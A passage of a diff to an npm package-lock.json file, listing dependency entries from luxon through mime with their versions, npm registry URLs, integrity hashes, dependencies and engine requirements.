"integrity": "sha512-BpdYkt9EvGl8OfWHDQPISVpcl5xZthb+XPsbELj5AQXxIC8IriDZIQYjBJPEm5rS420sjZ0TLEzRcq5KdBhYrQ==", + "dev": true, + "dependencies": { + "es5-ext": "~0.10.2" + } + }, + "node_modules/luxon": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.5.0.tgz", + "integrity": "sha512-rh+Zjr6DNfUYR3bPwJEnuwDdqMbxZW7LOQfUN4B54+Cl+0o5zaU9RJ6bcidfDtC1cWCZXQ+nvX8bf6bAji37QQ==", + "license": "MIT", + "engines": { + "node": ">=12" + } + }, + "node_modules/lz-string": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/lz-string/-/lz-string-1.5.0.tgz", + "integrity": "sha512-h5bgJWpxJNswbU7qCrV0tIKQCaS3blPDrqKWx+QxzuzL1zGUzij9XCWLrSLsJPu5t+eWA/ycetzYAO5IOMcWAQ==", + "dev": true, + "bin": { + "lz-string": "bin/bin.js" + } + }, + "node_modules/magic-string": { + "version": "0.30.17", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.17.tgz", + "integrity": "sha512-sNPKHvyjVf7gyjwS4xGTaW/mCnF8wnjtifKBEhxfZ7E/S8tQ0rssrwGNn6q8JH/ohItJfSQp9mBtQYuTlH5QnA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.5.0" + } + }, + "node_modules/mailtrap": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/mailtrap/-/mailtrap-3.4.0.tgz", + "integrity": "sha512-gegg90/gMY8hvfxB+WMtE8RRZyhQr90jUw00QOLApIAomItumqFBCpZv5IfG51EUKThu9+p7X4QdNA4buryenw==", + "dev": true, + "license": "MIT", + "dependencies": { + "axios": ">=0.27" + }, + "engines": { + "node": ">=16.20.1", + "yarn": ">=1.22.17" + }, + "peerDependencies": { + "@types/nodemailer": "^6.4.9", + "nodemailer": "^6.9.4" + }, + "peerDependenciesMeta": { + "@types/nodemailer": { + "optional": true + }, + "nodemailer": { + "optional": true + } + } + }, + "node_modules/make-dir": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-2.1.0.tgz", + "integrity": "sha512-LS9X+dc8KLxXCb8dni79fLIIUA5VyZoyjSMCwTluaXA0o27cCK0bhXkpgw+sTXVpPy/lSO57ilRixqk0vDmtRA==", + "dev": true, + "dependencies": { + "pify": "^4.0.1", + "semver": "^5.6.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/make-dir/node_modules/pify": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/pify/-/pify-4.0.1.tgz", + "integrity": "sha512-uB80kBFb/tfd68bVleG9T5GGsGPjJrLAUpR5PZIrhBnIaRTQRjqdJSsIKkOP6OAIFbj7GOrcudc5pNjZ+geV2g==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/make-dir/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "dev": true, + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/map-cache": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/map-cache/-/map-cache-0.2.2.tgz", + "integrity": "sha512-8y/eV9QQZCiyn1SprXSrCmqJN0yNRATe+PO8ztwqrvrbdRLA3eYJF0yaR0YayLWkMbsQSKWS9N2gPcGEc4UsZg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/map-obj": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/map-obj/-/map-obj-2.0.0.tgz", + "integrity": "sha1-plzSkIepJZi4eRJXpSPgISIqwfk=", + "engines": { + "node": ">=4" + } + }, + "node_modules/map-or-similar": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/map-or-similar/-/map-or-similar-1.5.0.tgz", + "integrity": "sha512-0aF7ZmVon1igznGI4VS30yugpduQW3y3GkcgGJOp7d8x8QrizhigUxjI/m2UojsXXto+jLAH3KSz+xOJTiORjg==", + "dev": true, + "license": "MIT" + }, + "node_modules/map-visit": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/map-visit/-/map-visit-1.0.0.tgz", + "integrity": "sha512-4y7uGv8bd2WdM9vpQsiQNo41Ln1NvhvDRuVt0k2JZQ+ezN2uaQes7lZeZ+QQUHOLQAtDaBJ+7wCbi+ab/KFs+w==", + "dev": true, + "dependencies": { + "object-visit": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/markdown-it": { + "version": "14.1.0", + "resolved": "https://registry.npmjs.org/markdown-it/-/markdown-it-14.1.0.tgz", + "integrity": "sha512-a54IwgWPaeBCAAsv13YgmALOF1elABB08FxO9i+r4VFk5Vl4pKokRPeX8u5TCgSsPi6ec1otfLjdOpVcgbpshg==", + "dependencies": { + "argparse": "^2.0.1", + "entities": "^4.4.0", + "linkify-it": "^5.0.0", + "mdurl": "^2.0.0", + "punycode.js": "^2.3.1", + "uc.micro": "^2.1.0" + }, + "bin": { + "markdown-it": "bin/markdown-it.mjs" + } + }, + "node_modules/markdown-it-anchor": { + "version": "8.6.7", + "resolved": "https://registry.npmjs.org/markdown-it-anchor/-/markdown-it-anchor-8.6.7.tgz", + "integrity": "sha512-FlCHFwNnutLgVTflOYHPW2pPcl2AACqVzExlkGQNsi4CJgqOHN7YTgDd4LuhgN1BFO3TS0vLAruV1Td6dwWPJA==", + "peerDependencies": { + "@types/markdown-it": "*", + "markdown-it": "*" + } + }, + "node_modules/markdown-it/node_modules/entities": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", + "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==", + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "node_modules/markdown-it/node_modules/uc.micro": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/uc.micro/-/uc.micro-2.1.0.tgz", + "integrity": "sha512-ARDJmphmdvUk6Glw7y9DQ2bFkKBHwQHLi2lsaH6PPmz/Ka9sFOBsBluozhDltWmnv9u/cF6Rt87znRTPV+yp/A==" + }, + "node_modules/marked": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/marked/-/marked-4.1.0.tgz", + "integrity": "sha512-+Z6KDjSPa6/723PQYyc1axYZpYYpDnECDaU6hkaf5gqBieBkMKYReL5hteF2QizhlMbgbo8umXl/clZ67+GlsA==", + "bin": { + "marked": "bin/marked.js" + }, + "engines": { + "node": ">= 12" + } + }, + "node_modules/match-sorter": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/match-sorter/-/match-sorter-6.3.1.tgz", + "integrity": "sha512-mxybbo3pPNuA+ZuCUhm5bwNkXrJTbsk5VWbR5wiwz/GC6LIiegBGn2w3O08UG/jdbYLinw51fSQ5xNU1U3MgBw==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5", + "remove-accents": "0.4.2" + } + }, + "node_modules/matchmediaquery": { + "version": "0.4.2", + "resolved": "https://registry.npmjs.org/matchmediaquery/-/matchmediaquery-0.4.2.tgz", + "integrity": "sha512-wrZpoT50ehYOudhDjt/YvUJc6eUzcdFPdmbizfgvswCKNHD1/OBOHYJpHie+HXpu6bSkEGieFMYk6VuutaiRfA==", + "dependencies": { + "css-mediaquery": "^0.1.2" + } + }, + "node_modules/material-colors": { + "version": "1.2.6", + "resolved": "https://registry.npmjs.org/material-colors/-/material-colors-1.2.6.tgz", + "integrity": "sha512-6qE4B9deFBIa9YSpOc9O0Sgc43zTeVYbgDT5veRKSlB2+ZuHNoVVxA1L/ckMUayV9Ay9y7Z/SZCLcGteW9i7bg==", + "dev": true + }, + "node_modules/mathjax": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/mathjax/-/mathjax-3.2.2.tgz", + "integrity": "sha512-Bt+SSVU8eBG27zChVewOicYs7Xsdt40qm4+UpHyX7k0/O9NliPc+x77k1/FEsPsjKPZGJvtRZM1vO+geW0OhGw==", + "dev": true + }, + "node_modules/mathml-tag-names": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/mathml-tag-names/-/mathml-tag-names-2.1.3.tgz", + "integrity": "sha512-APMBEanjybaPzUrfqU0IMU5I0AswKMH7k8OTLs0vvV4KZpExkTkY87nR/zpbuTPj+gARop7aGUbl11pnDfW6xg==", + "dev": true, + "peer": true, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/maxmind": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/maxmind/-/maxmind-4.3.6.tgz", + "integrity": "sha512-CwnEZqJX0T6b2rWrc0/V3n9hL/hWAMEn7fY09077YJUHiHx7cn/esA2ZIz8BpYLSJUf7cGVel0oUJa9jMwyQpg==", + "dependencies": { + "mmdb-lib": "2.0.2", + "tiny-lru": "8.0.2" + }, + "engines": { + "node": ">=10", + "npm": ">=6" + } + }, + "node_modules/mdn-data": { + "version": "2.0.30", + "resolved": "https://registry.npmjs.org/mdn-data/-/mdn-data-2.0.30.tgz", + "integrity": "sha512-GaqWWShW4kv/G9IEucWScBx9G1/vsFZZJUO+tD26M8J8z3Kw5RDQjaoZe03YAClgeS/SWPOcb4nkFBTEi5DUEA==", + "dev": true + }, + "node_modules/mdurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/mdurl/-/mdurl-2.0.0.tgz", + "integrity": "sha512-Lf+9+2r+Tdp5wXDXC4PcIBjTDtq4UKjCPMQhKIuzpJNW0b96kVqSwW0bT7FhRSfmAiFYgP+SCRvdrDozfh0U5w==" + }, + "node_modules/media-typer": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz", + "integrity": "sha1-hxDXrwqmJvj/+hzgAWhUUmMlV0g=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/memfs": { + "version": "3.5.1", + "resolved": "https://registry.npmjs.org/memfs/-/memfs-3.5.1.tgz", + "integrity": "sha512-UWbFJKvj5k+nETdteFndTpYxdeTMox/ULeqX5k/dpaQJCCFmj5EeKv3dBcyO2xmkRAx2vppRu5dVG7SOtsGOzA==", + "dev": true, + "dependencies": { + "fs-monkey": "^1.0.3" + }, + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/memoizee": { + "version": "0.4.15", + "resolved": "https://registry.npmjs.org/memoizee/-/memoizee-0.4.15.tgz", + "integrity": "sha512-UBWmJpLZd5STPm7PMUlOw/TSy972M+z8gcyQ5veOnSDRREz/0bmpyTfKt3/51DhEBqCZQn1udM/5flcSPYhkdQ==", + "dev": true, + "dependencies": { + "d": "^1.0.1", + "es5-ext": "^0.10.53", + "es6-weak-map": "^2.0.3", + "event-emitter": "^0.3.5", + "is-promise": "^2.2.2", + "lru-queue": "^0.1.0", + "next-tick": "^1.1.0", + "timers-ext": "^0.1.7" + } + }, + "node_modules/memoizerific": { + "version": "1.11.3", + "resolved": "https://registry.npmjs.org/memoizerific/-/memoizerific-1.11.3.tgz", + "integrity": "sha512-/EuHYwAPdLtXwAwSZkh/Gutery6pD2KYd44oQLhAvQp/50mpyduZh8Q7PYHXTCJ+wuXxt7oij2LXyIJOOYFPog==", + "dev": true, + "license": "MIT", + "dependencies": { + "map-or-similar": "^1.5.0" + } + }, + "node_modules/memory-pager": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/memory-pager/-/memory-pager-1.5.0.tgz", + "integrity": "sha512-ZS4Bp4r/Zoeq6+NLJpP+0Zzm0pR8whtGPf1XExKLJBAczGMnSi3It14OiNCStjQjM6NU1okjQGSxgEZN8eBYKg==" + }, + "node_modules/mensch": { + "version": "0.3.4", + "resolved": "https://registry.npmjs.org/mensch/-/mensch-0.3.4.tgz", + "integrity": "sha512-IAeFvcOnV9V0Yk+bFhYR07O3yNina9ANIN5MoXBKYJ/RLYPurd2d0yw14MDhpr9/momp0WofT1bPUh3hkzdi/g==", + "dev": true + }, + "node_modules/meow": { + "version": "13.2.0", + "resolved": "https://registry.npmjs.org/meow/-/meow-13.2.0.tgz", + "integrity": "sha512-pxQJQzB6djGPXh08dacEloMFopsOqGVRKFPYvPOt9XDZ1HasbgDZA74CJGreSU4G3Ak7EFJGoiH2auq+yXISgA==", + "dev": true, + "peer": true, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/merge-descriptors": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz", + "integrity": "sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==", + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/merge-stream": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", + "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", + "dev": true + }, + "node_modules/merge2": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz", + "integrity": "sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==", + "dev": true, + "engines": { + "node": ">= 8" + } + }, + "node_modules/method-override": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/method-override/-/method-override-3.0.0.tgz", + "integrity": "sha512-IJ2NNN/mSl9w3kzWB92rcdHpz+HjkxhDJWNDBqSlas+zQdP8wBiJzITPg08M/k2uVvMow7Sk41atndNtt/PHSA==", + "dependencies": { + "debug": "3.1.0", + "methods": "~1.1.2", + "parseurl": "~1.3.2", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/method-override/node_modules/debug": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.1.0.tgz", + "integrity": "sha512-OX8XqP7/1a9cqkxYw2yXss15f26NKWBpDXQd0/uK/KPqdQhxbPa994hnzjcE2VqQpDslf55723cKPUOGSmMY3g==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/method-override/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "node_modules/methods": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/methods/-/methods-1.1.2.tgz", + "integrity": "sha1-VSmk1nZUE07cxSZmVoNbD4Ua/O4=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mhook": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/mhook/-/mhook-1.0.1.tgz", + "integrity": "sha1-C6igyiARIlgzA9tKsdDi/5jytUw=" + }, + "node_modules/micromark": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/micromark/-/micromark-4.0.0.tgz", + "integrity": "sha512-o/sd0nMof8kYff+TqcDx3VSrgBTcZpSvYcAHIfHhv5VAuNmisCxjhx6YmxS8PFEpb9z5WKWKPdzf0jM23ro3RQ==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "@types/debug": "^4.0.0", + "debug": "^4.0.0", + "decode-named-character-reference": "^1.0.0", + "devlop": "^1.0.0", + "micromark-core-commonmark": "^2.0.0", + "micromark-factory-space": "^2.0.0", + "micromark-util-character": "^2.0.0", + "micromark-util-chunked": "^2.0.0", + "micromark-util-combine-extensions": "^2.0.0", + "micromark-util-decode-numeric-character-reference": "^2.0.0", + "micromark-util-encode": "^2.0.0", + "micromark-util-normalize-identifier": "^2.0.0", + "micromark-util-resolve-all": "^2.0.0", + "micromark-util-sanitize-uri": "^2.0.0", + "micromark-util-subtokenize": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-core-commonmark": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-core-commonmark/-/micromark-core-commonmark-2.0.0.tgz", + "integrity": "sha512-jThOz/pVmAYUtkroV3D5c1osFXAMv9e0ypGDOIZuCeAe91/sD6BoE2Sjzt30yuXtwOYUmySOhMas/PVyh02itA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "decode-named-character-reference": "^1.0.0", + "devlop": "^1.0.0", + "micromark-factory-destination": "^2.0.0", + "micromark-factory-label": "^2.0.0", + "micromark-factory-space": "^2.0.0", + "micromark-factory-title": "^2.0.0", + "micromark-factory-whitespace": "^2.0.0", + "micromark-util-character": "^2.0.0", + "micromark-util-chunked": "^2.0.0", + "micromark-util-classify-character": "^2.0.0", + "micromark-util-html-tag-name": "^2.0.0", + "micromark-util-normalize-identifier": "^2.0.0", + "micromark-util-resolve-all": "^2.0.0", + "micromark-util-subtokenize": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-destination": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-destination/-/micromark-factory-destination-2.0.0.tgz", + "integrity": "sha512-j9DGrQLm/Uhl2tCzcbLhy5kXsgkHUrjJHg4fFAeoMRwJmJerT9aw4FEhIbZStWN8A3qMwOp1uzHr4UL8AInxtA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-label": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-label/-/micromark-factory-label-2.0.0.tgz", + "integrity": "sha512-RR3i96ohZGde//4WSe/dJsxOX6vxIg9TimLAS3i4EhBAFx8Sm5SmqVfR8E87DPSR31nEAjZfbt91OMZWcNgdZw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "devlop": "^1.0.0", + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-space": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-space/-/micromark-factory-space-2.0.0.tgz", + "integrity": "sha512-TKr+LIDX2pkBJXFLzpyPyljzYK3MtmllMUMODTQJIUfDGncESaqB90db9IAUcz4AZAJFdd8U9zOp9ty1458rxg==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-character": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-title": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-title/-/micromark-factory-title-2.0.0.tgz", + "integrity": "sha512-jY8CSxmpWLOxS+t8W+FG3Xigc0RDQA9bKMY/EwILvsesiRniiVMejYTE4wumNc2f4UbAa4WsHqe3J1QS1sli+A==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-factory-space": "^2.0.0", + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-factory-whitespace": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-factory-whitespace/-/micromark-factory-whitespace-2.0.0.tgz", + "integrity": "sha512-28kbwaBjc5yAI1XadbdPYHX/eDnqaUFVikLwrO7FDnKG7lpgxnvk/XGRhX/PN0mOZ+dBSZ+LgunHS+6tYQAzhA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-factory-space": "^2.0.0", + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-character": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/micromark-util-character/-/micromark-util-character-2.1.0.tgz", + "integrity": "sha512-KvOVV+X1yLBfs9dCBSopq/+G1PcgT3lAK07mC4BzXi5E7ahzMAF8oIupDDJ6mievI6F+lAATkbQQlQixJfT3aQ==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-chunked": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-chunked/-/micromark-util-chunked-2.0.0.tgz", + "integrity": "sha512-anK8SWmNphkXdaKgz5hJvGa7l00qmcaUQoMYsBwDlSKFKjc6gjGXPDw3FNL3Nbwq5L8gE+RCbGqTw49FK5Qyvg==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-symbol": "^2.0.0" + } + }, + "node_modules/micromark-util-classify-character": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-classify-character/-/micromark-util-classify-character-2.0.0.tgz", + "integrity": "sha512-S0ze2R9GH+fu41FA7pbSqNWObo/kzwf8rN/+IGlW/4tC6oACOs8B++bh+i9bVyNnwCcuksbFwsBme5OCKXCwIw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-character": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-combine-extensions": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-combine-extensions/-/micromark-util-combine-extensions-2.0.0.tgz", + "integrity": "sha512-vZZio48k7ON0fVS3CUgFatWHoKbbLTK/rT7pzpJ4Bjp5JjkZeasRfrS9wsBdDJK2cJLHMckXZdzPSSr1B8a4oQ==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-chunked": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-decode-numeric-character-reference": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/micromark-util-decode-numeric-character-reference/-/micromark-util-decode-numeric-character-reference-2.0.1.tgz", + "integrity": "sha512-bmkNc7z8Wn6kgjZmVHOX3SowGmVdhYS7yBpMnuMnPzDq/6xwVA604DuOXMZTO1lvq01g+Adfa0pE2UKGlxL1XQ==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-symbol": "^2.0.0" + } + }, + "node_modules/micromark-util-encode": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-encode/-/micromark-util-encode-2.0.0.tgz", + "integrity": "sha512-pS+ROfCXAGLWCOc8egcBvT0kf27GoWMqtdarNfDcjb6YLuV5cM3ioG45Ys2qOVqeqSbjaKg72vU+Wby3eddPsA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ] + }, + "node_modules/micromark-util-html-tag-name": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-html-tag-name/-/micromark-util-html-tag-name-2.0.0.tgz", + "integrity": "sha512-xNn4Pqkj2puRhKdKTm8t1YHC/BAjx6CEwRFXntTaRf/x16aqka6ouVoutm+QdkISTlT7e2zU7U4ZdlDLJd2Mcw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ] + }, + "node_modules/micromark-util-normalize-identifier": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-normalize-identifier/-/micromark-util-normalize-identifier-2.0.0.tgz", + "integrity": "sha512-2xhYT0sfo85FMrUPtHcPo2rrp1lwbDEEzpx7jiH2xXJLqBuy4H0GgXk5ToU8IEwoROtXuL8ND0ttVa4rNqYK3w==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-symbol": "^2.0.0" + } + }, + "node_modules/micromark-util-resolve-all": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-resolve-all/-/micromark-util-resolve-all-2.0.0.tgz", + "integrity": "sha512-6KU6qO7DZ7GJkaCgwBNtplXCvGkJToU86ybBAUdavvgsCiG8lSSvYxr9MhwmQ+udpzywHsl4RpGJsYWG1pDOcA==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-sanitize-uri": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-sanitize-uri/-/micromark-util-sanitize-uri-2.0.0.tgz", + "integrity": "sha512-WhYv5UEcZrbAtlsnPuChHUAsu/iBPOVaEVsntLBIdpibO0ddy8OzavZz3iL2xVvBZOpolujSliP65Kq0/7KIYw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "micromark-util-character": "^2.0.0", + "micromark-util-encode": "^2.0.0", + "micromark-util-symbol": "^2.0.0" + } + }, + "node_modules/micromark-util-subtokenize": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-subtokenize/-/micromark-util-subtokenize-2.0.0.tgz", + "integrity": "sha512-vc93L1t+gpR3p8jxeVdaYlbV2jTYteDje19rNSS/H5dlhxUYll5Fy6vJ2cDwP8RnsXi818yGty1ayP55y3W6fg==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "devlop": "^1.0.0", + "micromark-util-chunked": "^2.0.0", + "micromark-util-symbol": "^2.0.0", + "micromark-util-types": "^2.0.0" + } + }, + "node_modules/micromark-util-symbol": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-symbol/-/micromark-util-symbol-2.0.0.tgz", + "integrity": "sha512-8JZt9ElZ5kyTnO94muPxIGS8oyElRJaiJO8EzV6ZSyGQ1Is8xwl4Q45qU5UOg+bGH4AikWziz0iN4sFLWs8PGw==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ] + }, + "node_modules/micromark-util-types": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/micromark-util-types/-/micromark-util-types-2.0.0.tgz", + "integrity": "sha512-oNh6S2WMHWRZrmutsRmDDfkzKtxF+bc2VxLC9dvtrDIRFln627VsFP6fLMgTryGDljgLPjkrzQSDcPrjPyDJ5w==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ] + }, + "node_modules/micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "license": "MIT", + "dependencies": { + "braces": "^3.0.3", + "picomatch": "^2.3.1" + }, + "engines": { + "node": ">=8.6" + } + }, + "node_modules/mime": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-2.6.0.tgz", + "integrity": 